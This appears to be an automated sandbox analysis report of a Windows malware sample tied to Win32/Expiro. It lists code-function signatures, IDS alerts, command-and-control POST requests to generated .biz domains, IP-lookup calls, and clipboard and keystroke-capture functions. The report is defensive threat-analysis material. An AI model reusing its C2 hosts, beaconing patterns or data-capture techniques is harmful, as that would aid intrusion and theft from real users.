                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0046F0F2
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0046F3F3
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_004637EF
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00463B12
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0046BCBC
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h5_2_0276DD30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04EA87E1h5_2_04EA8530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04EA8F37h5_2_04EA8B08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04EA8F37h5_2_04EA8E64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h15_2_02BCDD30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053C87E1h15_2_053C8530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053C8F37h15_2_053C8B18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053C8F37h15_2_053C8E64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053C8F37h15_2_053C8B08

                  Networking

                  Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:62334 -> 1.1.1.1:53
                  Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49744 -> 54.244.188.177:80
                  Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49790 -> 82.112.184.197:80
                  Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:52629 -> 1.1.1.1:53
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 13.248.148.254
                  Source: Joe Sandbox View | IP Address: 13.248.148.254
                  Source: Joe Sandbox View | IP Address: 104.21.67.152
                  Source: Joe Sandbox View | IP Address: 44.221.84.105
                  Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknown | DNS query: name: checkip.dyndns.org
                  Source: unknown | DNS query: name: reallyfreegeoip.org
                  Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49737
                  Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49737
                  Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49731
                  Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49731
                  Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49734
                  Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49734
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 193.122.130.0:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
                  Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49881
                  Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49881
                  Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49872
                  Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49872
                  Source: global traffic | HTTP traffic detected: POST /lf HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /aah HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 844
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: global traffic | HTTP traffic detected: POST /hluumowlkjhsxe HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /hwjtljgqnsqgbc HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: POST /widfafwxfswrij HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: GET /widfafwxfswrij HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww99.przvgke.biz
                  Source: global traffic | HTTP traffic detected: GET /widfafwxfswrij?usid=26&utid=9204703590 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww7.przvgke.biz
                  Source: global traffic | HTTP traffic detected: POST /hx HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 842
                  Source: global traffic | HTTP traffic detected: POST /jenyp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                  Source: global traffic | HTTP traffic detected: GET /jenyp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww99.przvgke.biz
                  Source: global traffic | HTTP traffic detected: GET /jenyp?usid=26&utid=9204704395 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww12.przvgke.biz
                  Source: global traffic | HTTP traffic detected: POST /nwqf HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 842
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /rq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /vtrrtopft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /dmksqnbs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /vip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /lhocoojsqrafriia HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /fnbbnvvirqhlfx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /laps HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /bkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /kf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: GET /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.fwiwk.biz
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49736 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49752 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 1_2_004722EE
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
                  Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global traffic | DNS traffic detected: DNS query: cvgrf.biz
                  Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic | DNS traffic detected: DNS query: npukfztj.biz
                  Source: global traffic | DNS traffic detected: DNS query: przvgke.biz
                  Source: global traffic | DNS traffic detected: DNS query: ww99.przvgke.biz
                  Source: global traffic | DNS traffic detected: DNS query: ww7.przvgke.biz
                  Source: global traffic | DNS traffic detected: DNS query: ww12.przvgke.biz
                  Source: global traffic | DNS traffic detected: DNS query: zlenh.biz
                  Source: global traffic | DNS traffic detected: DNS query: knjghuig.biz
                  Source: global traffic | DNS traffic detected: DNS query: uhxqin.biz
                  Source: global traffic | DNS traffic detected: DNS query: anpmnmxo.biz
                  Source: global traffic | DNS traffic detected: DNS query: lpuegx.biz
                  Source: global traffic | DNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: global traffic | DNS traffic detected: DNS query: xlfhhhm.biz
                  Source: global traffic | DNS traffic detected: DNS query: ifsaia.biz
                  Source: global traffic | DNS traffic detected: DNS query: saytjshyf.biz
                  Source: global traffic | DNS traffic detected: DNS query: vcddkls.biz
                  Source: global traffic | DNS traffic detected: DNS query: fwiwk.biz
                  Source: global traffic | DNS traffic detected: DNS query: ww99.fwiwk.biz
                  Source: global traffic | DNS traffic detected: DNS query: ww7.fwiwk.biz
                  Source: unknown | HTTP traffic detected: POST /lf HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; Host: pywolwnvd.biz; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400; Content-Length: 778
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/q
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/qs#q
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/rq
                  Source: alg.exe, 00000003.00000003.1794290607.0000000000667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107:80/r
                  Source: alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/
                  Source: alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/hwjtljgqnsqgbc
                  Source: alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/hwjtljgqnsqgbcs
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1738442951.0000000000C21000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/3?
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/7q
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/?q
                  Source: x.exe, 00000001.00000002.1738685341.0000000000C42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/irtgqxbqsqyophmb
                  Source: x.exe, 00000001.00000002.1738685341.0000000000C42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/irtgqxbqsqyophmb&
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C11000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/irtgqxbqsqyophmbL
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/kqP
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1770456267.000000000066F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/lf
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/lfu
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177:80/irtgqxbqsqyophmbi
                  Source: alg.exe, 00000003.00000003.2410675571.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/
                  Source: alg.exe, 00000003.00000003.2412274626.0000000000667000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.0000000000667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197:80/dmksqnbs
                  Source: alg.exe, 00000003.00000003.2189424613.0000000000667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197:80/vtrrtopft
                  Source: alg.exe, 00000003.00000003.2189424613.000000000068B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
                  Source: alg.exe, 00000003.00000003.1893965929.000000000069B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590
                  Source: alg.exe, 00000003.00000003.1933405508.000000000067B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2410675571.0000000000695000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1966234277.0000000000690000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/jenyp
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2410675571.0000000000695000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1966234277.0000000000690000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/widfafwxfswrij
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/widfafwxfswriju
                  Source: alg.exe, 00000003.00000003.2415308900.00000000004A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/
                  Source: alg.exe, 00000003.00000003.1977645728.0000000001570000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                  Source: alg.exe, 00000003.00000003.2321824408.0000000001590000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                  Source: alg.exe, 00000003.00000003.2321824408.0000000001590000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
                  Source: alg.exe, 00000003.00000003.1924055176.0000000001530000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
                  Source: alg.exe, 00000003.00000003.1840894790.0000000001450000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/oauth2/authorize
                  Source: alg.exe, 00000003.00000003.1840894790.0000000001450000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/oauth2/authorizeInvalidBrowserSettingsBrowserCreationFailedInvalidRenderHand
                  Source: alg.exe, 00000003.00000003.1893965929.000000000069B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 1_2_00474164
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 1_2_00473F66
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 1_2_0046001C
